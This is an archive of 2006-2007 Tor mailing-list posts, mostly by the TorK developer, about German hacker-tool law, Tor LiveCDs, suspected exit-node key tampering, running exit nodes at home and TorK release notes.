 A rough estimate is that the ISO images have caused around 30-40 GB of
 BitTorrent traffic. I have no data about the subversion repository.
 The website should be in the sizes of dozens of MB.


 Greetings,
   Benjamin

I've added a placeholder entry for rockate to anonymityanywhere.com. If you'd 
like to provide some screenshots I can add them too.

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: End of ROCKate soon

2007-07-06 Thread Robert Hogan
On Friday 06 July 2007 17:50:08 Benjamin Schieder wrote:
 Hi people.

 In response to a law that passed the German legislative today, I will cease
 production, development and distribution of ROCKate binaries and - maybe -
 even source code soon.
 The reason is §202c StGB which states (IANAL translation):

 Producing, acquiring, selling, giving, distributing or making-accessible
 of passwords or other access codes as well as computer programs whose aim
 it is to commit a crime ... will be punished with up to one year in jail or
 a fine.


IANAL interpretation:

Unless the aim of ROCKate is to commit a crime, as opposed to facilitating 
privacy, then you have nothing to worry about. Honest.

Given Germany's recent history with Tor I understand your caution. And I don't 
think anyone would want to be the subject of a test case.

If the law is intended to mean a computer program that facilitates a crime 
then it's hard to think where the law could stop. I honestly think they are 
going after the bots and viruses with this, perhaps even programs that clone 
smart card information. If the remit is broader I'm really not sure how you 
could hang this law on Tor without hanging it on PGP as well. And then SSL 
and so on.

Are you aware of any other German software projects with similar concerns?

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: The Hidden Wiki is Gone ... so how can I find TOR-only web pages?

2007-06-08 Thread Robert Hogan
On Friday 08 June 2007 15:23:42 Rip Rock wrote:
 I had wanted to find out about who is posting web pages that require
 TOR to be viewed.

 http://6sxoyfb3h2nvok2d.onion/

 just has a sad little message that says, The *hidden **Wiki* is *gone*.

 There are some resources at:

 http://www.aolsearchin.com/
 but some of them appear to be completely out of date. Maybe some are
 current but not showing up right now.

 I guess this means I might have to join the mailing list at:

 http://archives.seul.org/or/talk/

 in order to get fun TOR urls to view.
 If anyone has any resources on fun TOR-specific URLs to surf, I'm
 listening.
 Thanks.

apropos of nothing, it's interesting how the notice on  
http://6sxoyfb3h2nvok2d.onion/ narrows down its location. 

'The hidden wiki is gone. If you set up a new one and post the link to the 
or-talk list I'll link it from here. 06/07/07.'

Not trying to be facetious, just a possible 'tell' worth bearing in mind if 
you're running a hidden server I guess.

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: suggestion for 'is my installation of tor working?' page

2007-05-13 Thread Robert Hogan
I've put together the sort of page I think new Tor users need to visit when 
they get started on Tor for the first time. It's designed for TorK users, so 
doesn't attempt to check your IP address or anything like that. Since it's 
very hard for a web service to know *all* Tor nodes at any given time, I 
wonder if the Tor node check is more confusing than it is helpful.

http://healthcheck.anonymityanywhere.com

I've basically just filleted the jscript at showmyip.com/torstatus and made it 
a little more user-friendly.

The catch with this sort of page is that a healthcheck website can only check 
for plugins/java/cookies if jscript is enabled, so you never get a fully 
green response. But at least it alerts users to the ways in which they can 
leak anonymity.

As an aside, shouldn't the download page mention the perils of javascript?


-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: www.torrify.com

2007-05-08 Thread Robert Hogan
On Tuesday 08 May 2007 22:52:29 Sam wrote:
 ???

 isn't TOR a volunteer effort?

 Are they using TOR and making $$'s off it?


They're perfectly entitled to. More power to their elbow. 

From what I understand of torrify though you are more or less back to trusting 
an 'anonymity provider', rather than trusting to the safety in numbers that 
characterizes the Tor network proper. And that seems a bit self-defeating.

Arrakis is the guy behind torrify and frequents this list. Arrakis, I take it 
the above is an unfair summary?
-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Tor LiveCD

2007-03-18 Thread Robert Hogan
This weekend I had a go at putting together a rudimentary Tor LiveCD. 
It's in usable condition (it boots, tork starts up and you can 
browse 'anonymously') but definitely not worth the bandwidth yet.

I've documented the procedure as it currently stands at 

http://tork.sourceforge.net/wiki/index.php/LiveCD

I don't have any particular opinion of which firewall/privoxy/permissions 
config is best, so invite anyone here to contribute to the wiki page to 
add/edit as they see fit. (That said, I would appreciate if you add rather 
than delete if performing substantial edits.)

If nothing else the wiki page might be a useful starting point for 
a 'canonical' Tor Live CD. 


-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


gpg refresh keys

2007-03-10 Thread Robert Hogan
A couple of things:

1. A funny thing happened on the way to the forum..

without tor:

[EMAIL PROTECTED]:~$ gpg --refresh-keys
gpg: NOTE: old default options file `/home/robert/.gnupg/options' ignored
gpg: refreshing 4 keys from hkp://wwwkeys.eu.pgp.net
gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net
gpg: key EA59038E: Stephen Gran [EMAIL PROTECTED] not changed
gpg: key 985A444B: Tomasz Kojm [EMAIL PROTECTED] not changed
gpg: key 22F6856F: Robert Hogan [EMAIL PROTECTED] not changed
gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] not changed
gpg: Total number processed: 4
gpg:  unchanged: 4


a few seconds later using tor/privoxy on exit mychat4004d801 (resolves to an 
edu.tw address):

bash-3.1$ gpg --refresh-keys
gpg: NOTE: old default options file `/home/robert/.gnupg/options' ignored
gpg: refreshing 4 keys from hkp://wwwkeys.eu.pgp.net
gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net
gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] 2 new signatures
gpg: Total number processed: 4
gpg:  unchanged: 3
gpg: new signatures: 2
gpg: 3 marginal(s) needed, 1 complete(s) needed, classic trust model
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u


I've removed reference to other keys that were verified and unchanged. Only 
Roger's was affected. I have a cloudy understanding of the gpg infrastructure 
but this seems suspicious. Anyone?

2. torify gpg --refresh-keys

I'm using the patched libsocks that handles dns itself and cannot get the 
above to work. Always times out. Has anyone else got it to work?

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net
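
The two transcripts in the message above can be compared mechanically rather than by eye. As an added example (not part of the original post), this sketch parses the per-key status lines of both runs and flags keys whose reported result differs between the direct and the Tor path, or for which one run shows no result line. The line format is assumed from the lines quoted in the post; the function names are hypothetical.

```python
import re

# Lines copied from the two runs quoted in the post (addresses already redacted).
DIRECT_RUN = """\
gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net
gpg: key EA59038E: Stephen Gran [EMAIL PROTECTED] not changed
gpg: key 985A444B: Tomasz Kojm [EMAIL PROTECTED] not changed
gpg: key 22F6856F: Robert Hogan [EMAIL PROTECTED] not changed
gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] not changed
"""

TOR_RUN = """\
gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net
gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net
gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] 2 new signatures
"""

REQUEST = re.compile(r"^gpg: requesting key ([0-9A-F]{8,40}) from")
# Assumed status forms: "not changed" or "<n> new <something>".
STATUS = re.compile(
    r"^gpg: key ([0-9A-F]{8,40}): .*?\b(not changed|\d+ new [A-Za-z ]+?)\s*$"
)


def parse_run(text):
    """Map each requested key ID to the list of status strings gpg printed."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        match = REQUEST.match(line)
        if match:
            result.setdefault(match.group(1), [])
            continue
        match = STATUS.match(line)
        if match:
            result.setdefault(match.group(1), []).append(match.group(2))
    return result


def compare_runs(first, second):
    """Classify every key seen in either run.

    same          both runs printed identical status lines
    differs       both runs printed a status, and they disagree
    not-reported  at least one run has no status line for the key
    """
    report = {}
    for key in sorted(set(first) | set(second)):
        a, b = first.get(key), second.get(key)
        if not a or not b:
            report[key] = "not-reported"
        elif sorted(a) == sorted(b):
            report[key] = "same"
        else:
            report[key] = "differs"
    return report


if __name__ == "__main__":
    for key, verdict in compare_runs(parse_run(DIRECT_RUN), parse_run(TOR_RUN)).items():
        print(key, verdict)
```

A "differs" verdict only marks a key for a closer look; it does not by itself say which path returned the altered data.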


Anyhoo...

2007-02-26 Thread Robert Hogan

On the face of it, forcing tor to be 'geo-diverse' (dread word) is fairly 
straightforward.

The option is called NodeFamily. Ask the author of your favourite tor 
controller to implement something like 'Enforce Geographical Diversity' and 
instruct tor to treat all servers in the same country as a nodefamily.

Of course, you could also do it yourself using:

https://torstat.xenobite.eu/index.php?SortBy=G

The chances are Tor itself will never do this for you - it has kludge written 
all over it. Also while it might mitigate looping through the same ISP at 
entry and exit, it will probably make you statistically *more* likely to hit 
a global adversary, such as, erm,  world gentil(l?)ery.

Thoughts anyone? Worth doing?
-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net
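
The do-it-yourself route described in the message above amounts to grouping relays by country and writing one NodeFamily line per group. As an added example (not part of the original post and not TorK code), this sketch does that for a constructed relay list and also counts how many three-hop paths survive the constraint, assuming uniform selection with no bandwidth weighting. The fingerprints and function names are made up for illustration.

```python
import re
from collections import defaultdict
from itertools import permutations

# Constructed relay list: (identity fingerprint, country code). Not real relays.
RELAYS = [
    ("A" * 40, "de"), ("B" * 40, "de"), ("C" * 40, "de"),
    ("D" * 40, "us"), ("E" * 40, "us"),
    ("F" * 40, "nl"),
    ("1" * 40, "fr"),
]

FINGERPRINT = re.compile(r"^[0-9A-F]{40}$")
COUNTRY = re.compile(r"^[a-z]{2}$")


def group_by_country(relays):
    """Validate the input and return {country: [fingerprint, ...]}."""
    groups = defaultdict(list)
    for fingerprint, country in relays:
        fingerprint = fingerprint.upper().lstrip("$")
        country = country.lower()
        if not FINGERPRINT.match(fingerprint):
            raise ValueError("bad fingerprint: %r" % fingerprint)
        if not COUNTRY.match(country):
            raise ValueError("bad country code: %r" % country)
        groups[country].append(fingerprint)
    return dict(groups)


def nodefamily_lines(relays):
    """One torrc NodeFamily line per country that has two or more relays."""
    lines = []
    for country, fingerprints in sorted(group_by_country(relays).items()):
        if len(fingerprints) < 2:
            continue  # a family of one relay constrains nothing
        members = ",".join("$" + fp for fp in sorted(fingerprints))
        lines.append("NodeFamily " + members)
    return lines


def count_paths(relays, one_per_country):
    """Count ordered three-relay paths, optionally requiring three countries.

    Simplification: every relay is equally likely and no other path rule
    (guards, exit policy, subnets) is applied.
    """
    total = 0
    for path in permutations(relays, 3):
        countries = {country for _, country in path}
        if one_per_country and len(countries) < 3:
            continue
        total += 1
    return total


if __name__ == "__main__":
    print("\n".join(nodefamily_lines(RELAYS)))
    print("paths without constraint:", count_paths(RELAYS, False))
    print("paths with one relay per country:", count_paths(RELAYS, True))
```

With this sample the constraint removes more than half of the candidate paths, which is the kind of side effect the message asks about.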


Re: question about router depth

2007-01-28 Thread Robert Hogan
On Sunday 28 January 2007 18:28, Rob wrote:
 I was listening to the security now podcast on twit about tor and I think
 they got it all wrong.  They made it sound like you could go through as
 many routers as you configure it to do.  I will send them an email.
 Thanks for the replies.

 Rob

 On Sun, 28 Jan 2007 08:28:28 -0500, Dan Collins [EMAIL PROTECTED]

 wrote:
  3. You are always going through 3 other routers, and there is no way to
  change that.
 

Unless I've misunderstood the question, you *can* create circuits with more 
than 3 routers. You can also use them. I just created a 4 router circuit with 
tork and fetched the rss feed from www.kde.org with it.

So your information is correct.

That said, there is no benefit to using more than 3 routers. And a stream with 
anything less than 3 is not very anonymous.


-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: TorK 0.13 Released - Many new features

2007-01-27 Thread Robert Hogan

Due to a cock-up on my part, this version of TorK is only compatible with the 
alpha series of Tor for the time being.

Once 'getinfo ns/all' makes it into the stable series, it'll be usable on both 
again.

Apologies if I've inconvenienced any 'stable' users.

BTW, will ns/all go into stable anytime soon? Or should I really consider 
winding back?


On Saturday 27 January 2007 22:40, Robert Hogan wrote:
 Hi All,

 I've just released a new version of TorK, with quite a few new features.

 The addition of a mixminion client, as well as the facility to manage
 anonymous use of Opera and Firefox, broadens TorK's horizons a bit.

 I'm still looking for new ideas/features for TorK so if you can think of
 something useful it should have, let me know.

 Screenshots are available at:

 http://www.kde-apps.org/content/preview.php?preview=1id=39442file1=39442-
1.pngfile2=39442-2.pngfile3=39442-3.pngname=TorK


 The highlights for the new release are (you may recognize the changelog
 style ;-) ):

 Major Features
 o New, improved set-up wizard (incomplete but fully functional).
 o Send Anonymous Email using mixminion.
 o Browse Anonymously with Firefox
 o Browse Anonymously with Opera
 o Graphs now show system network traffic on eth* interfaces.
 o Link to privoxy configuration.
 o Modify appearance of konqueror windows when anonymous browsing
 enabled (experimental).

 Minor Features
 o Optional 'Paranoid' mode for browsing.
 o Improvements to tor network display.
 o Make exit nodes in the server list identifiable.
 o Improvements to quick launch interface.
 o Reverse lookup IP address of servers when displaying their
 status.
 o Better 'guard' icons.
 o Better privoxy management.


 You can try it straight from CVS:

 [handy copy/paste for installing it]
 cd ~
 mkdir torkcvs
 cd torkcvs
 cvs -z3 -d:pserver:[EMAIL PROTECTED]:/cvsroot/tork co -P tork
 cd tork
 make -f Makefile.cvs
 ./configure
 make
 su -c 'make install'


 or download it at:

 http://sourceforge.net/project/showfiles.php?group_id=159836

 Regards,
 Robert

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: TorK 0.13 Released - Many new features

2007-01-27 Thread Robert Hogan
On Saturday 27 January 2007 23:22, Patrick Hooker wrote:
 C compiler cannot make
 executables

there are some suggestions in:

http://forums.gentoo.org/viewtopic.php?t=27719

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: [EMAIL PROTECTED]: Re: [pfSense Support] tor and traffic shaper]

2007-01-15 Thread Robert Hogan
On Monday 15 January 2007 11:18, Eugen Leitl wrote:
 - Forwarded message from mOjO [EMAIL PROTECTED] -

 From: mOjO [EMAIL PROTECTED]
 Date: Mon, 15 Jan 2007 03:43:21 -0600
 To: support@pfsense.com
 Subject: Re: [pfSense Support] tor and traffic shaper
 Reply-To: support@pfsense.com
 User-Agent: Thunderbird 1.5.0.9 (X11/20070103)

 yes i am... and quite well.

 first i just ran through the wizard.  then i edited the entries for
 torrents to match my ports (i use non-standard torrent ports) and then i


hasn't he seen 'tor' and read 'torrents'?


-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: more letters from the feds

2007-01-10 Thread Robert Hogan
On Monday 08 January 2007 11:42, Alexander Janssen wrote:
 And it also should be pointed out once again that it would be a rather
 stupid idea to run a TOR exit-node at home, for a dynamic IP-address
 is blinking wildly on their radar. The possible consequences are left
 up to your imagination.


I think this is a valid point. I ran an exit-node for a short while at home 
without thinking too much about it. The huge amount of traffic I was 
attracting (even within minutes of booting up) made me shut it off for the 
sake of personal convenience, but I don't think I will ever go back - 
explaining to the authorities why child porn/terrorist manuals/online fraud 
appear to have originated from my home IP is not an edifying prospect, to say 
the least.

These days I generally run a middle-man node but even that has started to feel 
inappropriate for home use. I would be amazed if regular appearances on 
directory servers does not blink wildly on some form of institutional radar, 
low-hanging fruit and all that.

So my questions are:

* From a common-sense, peace-of-mind point of view, is running an exit-node 
strictly for co-located servers? Does anyone here run one at home? If so, 
have you had second thoughts?

* Are tor-at-home users who run middleman servers out of the goodness of their 
heart possibly exposing themselves to unwanted attention? Do we have any 
evidence of such attention, anecdotal or otherwise?

* Is there some good way of helping a user to weigh this all up? 

Sorry for labouring the point a bit but I agree with the OP: I wouldn't 
recommend anyone to run an exit-server from home. Is this received wisdom 
among experienced users, or are we just being alarmist? If not, does this 
need to be spelt out to new users a little better, or do we just assume that 
they are competent enough to grasp all the possible consequences of their 
actions?

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: Wired article on Tor

2006-12-30 Thread Robert Hogan
On Saturday 30 December 2006 07:45, Anil Gulecha wrote:
 I wanted to know what the developers think :

 http://www.wired.com/news/technology/0,72375-0.html?tw=rss.technology


 Regards
The Tor authors were involved in the paper. Look through the or-talk archives 
from a few months ago - you should find mention of it.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


man in the middle?

2006-12-24 Thread Robert Hogan

Got this when testing an ssh connection:

WARNING: DSA key found for host shell.sf.net
in /home/robert/.ssh/known_hosts:8
DSA key fingerprint 4c:68:03:d4:5c:58:a6:1d:9d:17:13:24:14:48:ba:99.
The authenticity of host 'shell.sf.net (66.35.250.208)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is cf:9b:db:c4:53:c3:f0:0d:e8:c4:15:33:61:71:01:ca.
Are you sure you want to continue connecting (yes/no)? no


Tor first attempted to attach a circuit with toxischnet as its exit. This 
didn't work, so it then used tormentor. I then got the above.

I subsequently used both toxischnet and tormentor to connect without any key 
authentication issues. The RSA fingerprint is not listed by sourceforge. 

http://sourceforge.net/docs/G04/en/#fingerprintlist

Malice? Misconfiguration of some sort? Anyone care to test either of these 
exits?

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net
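
The warning in the message above appears when a host offers a key type that known_hosts does not hold while another type for the same host is already stored. As an added example (not part of the original post), this sketch parses known_hosts-style lines, computes fingerprints in the colon-separated MD5 form shown in the warning, and classifies an offered key against both the local file and a published fingerprint list. The host name and key blobs are constructed, so the fingerprints differ from those in the post; the function names are hypothetical.

```python
import base64
import hashlib
import struct


def make_blob(key_type, material):
    """Build a constructed key blob: length-prefixed type name + filler bytes."""
    name = key_type.encode("ascii")
    return base64.b64encode(struct.pack(">I", len(name)) + name + material).decode()


def md5_fingerprint(key_b64):
    """MD5 of the decoded key blob as colon-separated hex pairs."""
    digest = hashlib.md5(base64.b64decode(key_b64)).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def blob_key_type(key_b64):
    """Read the key type string embedded at the start of the blob."""
    blob = base64.b64decode(key_b64)
    (length,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + length].decode("ascii")


def parse_known_hosts(text):
    """Return {host: {key_type: fingerprint}} for plain (unhashed) entries."""
    known = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip comments, @cert-authority/@revoked markers and hashed hosts.
        if not line or line.startswith(("#", "@", "|")):
            continue
        fields = line.split()
        if len(fields) < 3:
            continue
        hosts, key_type, key_b64 = fields[:3]
        try:
            if blob_key_type(key_b64) != key_type:
                continue  # declared type and blob disagree: ignore the entry
            fingerprint = md5_fingerprint(key_b64)
        except (ValueError, struct.error, UnicodeDecodeError):
            continue
        for host in hosts.split(","):
            known.setdefault(host, {})[key_type] = fingerprint
    return known


def assess(host, key_type, fingerprint, known, published):
    """Classify an offered host key.

    match                 same type stored, same fingerprint
    changed               same type stored, different fingerprint
    new-type-published    type not stored, fingerprint is on the published list
    new-type-unpublished  type not stored, other types are, not published
                          (the situation in the post: answer "no")
    unknown-host          nothing stored and not published
    """
    host_keys = known.get(host, {})
    if key_type in host_keys:
        return "match" if host_keys[key_type] == fingerprint else "changed"
    if fingerprint in published:
        return "new-type-published"
    if host_keys:
        return "new-type-unpublished"
    return "unknown-host"


# Constructed sample data.
HOST = "shell.example.net"
DSA_B64 = make_blob("ssh-dss", b"constructed DSA key material")
RSA_B64 = make_blob("ssh-rsa", b"constructed RSA key material")
KNOWN_HOSTS = (
    "# constructed sample file\n"
    "%s,192.0.2.10 ssh-dss %s\n" % (HOST, DSA_B64)
)
PUBLISHED = {md5_fingerprint(DSA_B64)}  # stands in for the operator's list

if __name__ == "__main__":
    known = parse_known_hosts(KNOWN_HOSTS)
    offered = md5_fingerprint(RSA_B64)
    print(offered, assess(HOST, "ssh-rsa", offered, known, PUBLISHED))
```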


Re: suggestion for 'is my installation of tor working?' page

2006-12-21 Thread Robert Hogan
On Thursday 21 December 2006 05:19, you wrote:
 Good idea.  We will work on getting a page available on showmyip.com to do
 this - maybe something like http://www.showmyip.com/torstatus/ with just
 the relevant data for new Tor users.

 . . .
 Wesley Kenzie
 WebMaster
 http://www.showmyip.com/
 http://www.privacy-ecosystem.com/



Sounds great, looking forward to it!

I'll direct TorK users to it once it's up and running.


 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On
 Behalf Of Robert Hogan
 Sent: December 19, 2006 1:07 PM
 To: or-talk@freehaven.net
 Subject: suggestion for 'is my installation of tor working?' page



 Hi all,

 http://lefkada.eecs.harvard.edu/cgi-bin/ipaddr.pl?tor=1
 https://tns.nighteffect.com/
 https://torstat.xenobite.eu/

 All of the above provide useful information for the first-time tor user.
 But the last two are only really meaningful to initiates (and probably
 confusing to everyone else), while the first is reassuring but could really
 offer a little more.

 What is needed (IMVHO) is a page that confirms you are using tor
 successfully, but also introduces you to the other services that tor offers
 and also some advice for the tor debutante. A sort of official or unofficial
 'welcome to the tor network' page. This could be linked to in the
 FAQ/INSTALL and used by controllers/front-ends.

 Would the maintainers of any of the above be interested in providing such a
 thing? Given that the heavy lifting has already been done on all of the
 above, it would be very trivial to create. Would there be an appetite for
 such a thing on the tor homepage itself?

 Suggestions for content:

 * A warm greeting!
 * Top Five things all tor users should know
 * Appeal for users to run servers and link to how-to
 * An introduction to some hidden services

 Anyway, just a thought...

 Robert

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: suggestion for 'is my installation of tor working?' page

2006-12-19 Thread Robert Hogan
On Tuesday 19 December 2006 21:22, Michael Holstein wrote:
 what about http://www.showmyip.com

 It will tell you if you're using a TOR node (and which one, as well as
 its exit policy)

 ~Mike.


It's almost as overwhelming as tns and torstat. I guess I'm thinking more 
along the lines of a landing page for tor users. Something that will ease the 
first-time user into anonymous browsing and perhaps give them some do's and 
don'ts before they get started, along with a basic health check on their 
browser settings.

Some more suggestions (taken from good stuff buried halfway down showmyip):

* Browser detected
* Detection of flash/javascript/cookies with health warnings if enabled.


My point is that it would be such an easy thing to do given that all of these 
sites have the infrastructure already in place. Just a question of 
presentation.



 Robert Hogan wrote:
  Hi all,
 
  http://lefkada.eecs.harvard.edu/cgi-bin/ipaddr.pl?tor=1
  https://tns.nighteffect.com/
  https://torstat.xenobite.eu/
 
  All of the above provide useful information for the first-time tor user.
  But the last two are only really meaningful to initiates (and probably
  confusing to everyone else), while the first is reassuring but could
  really offer a little more.
 
  What is needed (IMVHO) is a page that confirms you are using tor
  successfully, but also introduces you to the other services that tor
  offers and also some advice for the tor debutante. A sort of official or
  unofficial 'welcome to the tor network' page. This could be linked to in
  the FAQ/INSTALL and used by controllers/front-ends.
 
  Would the maintainers of any of the above be interested in providing such
  a thing? Given that the heavy lifting has already been done on all of the
  above, it would be very trivial to create. Would there be an appetite for
  such a thing on the tor homepage itself?
 
  Suggestions for content:
 
  * A warm greeting!
  * Top Five things all tor users should know
  * Appeal for users to run servers and link to how-to
  * An introduction to some hidden services
 
  Anyway, just a thought...
 
  Robert

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: How can I trust all my Tor nodes in path

2006-12-01 Thread Robert Hogan
On Friday 01 December 2006 20:55, Tim Warren wrote:
 On 12/1/06, Robert Hogan [EMAIL PROTECTED] wrote:
  The real danger with Tor is using sensitive information over http rather
  than https and mixing anonymous and non-anonymous traffic over the same
  circuit. Those two are the most common and most easy mistakes to make.

 Maybe you could answer a question for me. Should I NOT login in to a site,
 such as a bank, when using Tor? Or do I need to make sure it is https:?

 Appreciate any clarification.

 Thanks,

If you use https (and your browser hasn't complained about the ssl 
certificate) you're fine.  The exit node can see everything (if they want) 
over http. 

Everything after the exit node is just as good or bad as if you weren't using 
tor. Tor just adds an extra guy to the chain of *reputable* carriers who 
*could* monitor your traffic - and it is best practice to assume that at 
least the tor exit node is doing exactly that. see http://tor.unixgu.ru


-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: How can I trust all my Tor nodes in path

2006-12-01 Thread Robert Hogan
On Friday 01 December 2006 21:23, Seth David Schoen wrote:

 Some people have suggested that this is a good application for
 trusted computing; proxies could prove that they're running the
 real, official proxy software on top of real hardware.  Then timing
 attacks are still possible, but actually logging data directly could
 be prevented.  The problem with this seems to be that intentionally
 doing timing attacks directly against a proxy you operate, from within
 the same network, is probably pretty effective!  

You've lost me here - could you explain further? How would it prevent logging 
data?

 This approach might 
 be more relevant to lower-latency anonymity services such as e-mail
 remailers.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Opening controlport by default

2006-11-26 Thread Robert Hogan
Hi all,

Did tor ever open the control port by default? It's not doing so now.

I can certainly understand why it might not be a good idea to open the control 
port without an explicit request to do so. However, the flip side is that a 
default installation of tor (especially a packaged one where the user hasn't 
had to familiarize themselves with the conf files and tor starts 
automatically at boot-time) can't be used by a controller out-of-the-box on 
*nix. This was certainly my experience of the (rather old) tor package for 
kubuntu.

The solution might be to include a configuration script with tor. Something the 
controller could call upon to help the user through a bit of default 
configuration to make tor controller-friendly. This script could also run 
through the boot-time setup of tor. I guess it could even help configure 
privoxy/polipo in a way that is useful to tor.

Has anyone given any thought to this? Controller issues aside it would be a 
very useful bridge between installing tor on *nix and getting it up and 
running.

On the same note, is anyone familiar with a multi-distro setup script that 
this could be based on?

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


TorK 0.11 Released

2006-11-13 Thread Robert Hogan
Hi All,

A new version of TorK has been released and I'm looking for as much 
destructive/constructive criticism as possible!

TorK is a Tor Controller for KDE. TorK allows you to configure, run and update 
Tor. It also allows you to view the Tor network and choose how you would like 
to interact with the network.

Download at http://sourceforge.net/project/showfiles.php?group_id=159836
Home page at http://tork.sf.net

TorK contains a number of unique/useful features:

* (NEW) A quickstart page for launching torified applications.
See https://sourceforge.net/project/screenshots.php?group_id=159836

* A hidden services wizard that allows you to create and publish hidden 
services.

* A drag-and-drop view of the Tor network. Create, modify and close circuits. 
Attach and detach streams manually from circuits. Click on servers to view 
their full details.

* Exit node blocking/preferring by country and server name.
 See 
https://sourceforge.net/project/screenshots.php?group_id=159836ssid=45119

* Tor and Non-Tor traffic logs - showing you the traffic that is going through 
Tor and the traffic that is not. The Tor traffic log maintains a record of 
the circuit you used for each connection. Both logs are maintained in memory 
only and can be flushed by the user at any time.

* A turn-on-and-off-able mini-view that shows you the traffic currently going 
through Tor - including destination, status, and exit node's name and 
country.

* Passive pop-ups alerting you to important Tor events, such as changes to  
your server status, DNS leaks, errors reported by Tor.

* Quick configuration - six default configurations available for getting Tor 
running the simple and easy way.

* Full access to all Tor configuration options.

I've changed the official status of TorK from alpha to beta because I really 
think it's getting there. If you try TorK please let me know about its 
shortcomings either by contacting [EMAIL PROTECTED] or the feedback 
feature built into TorK.

Thanks for your time!

Robert

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: ciruit history

2006-11-11 Thread Robert Hogan
On Monday 06 November 2006 22:16, Kees Vonk wrote:
 Does Tor keep a note of the different circuits it chooses? I am
 interested in seeing what entry and exit nodes are being used over a
 period of time.

TorK does this for you - but does not write the history to a file.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: Practical onion hacking: finding the real address of Tor clients

2006-10-20 Thread Robert Hogan
On Friday 20 October 2006 14:53, Fabian Keil wrote:

  For a user new to Tor, the documentation is often confusing or
  ambiguous, important information is missing, and sometimes minor details
  over emphasized (especially in Tor FAQ). Tor is a young product and
  hopefully these problems will be remedied as it grows. In the meantime
  though, some users are depending on it for anonymity. You can be sure
  that someone in Red China, searching for information his or her
  government does not want them to see, is not likely to have mis
  configured or misused Tor for want of trying to get it right.

 I assume you mean the opposite of the last sentence?

I can't speak for the OP but I think he meant what he said. If someone is 
using Tor, they are *trying* to be anonymous. Whether they are successful or 
not depends on how well they've digested the FAQ - and I think it is a fair 
point that some things (such as javascript/flash and the perils of unencrypted 
traffic) require more emphasis than others (e.g. why is tor so slow, how 
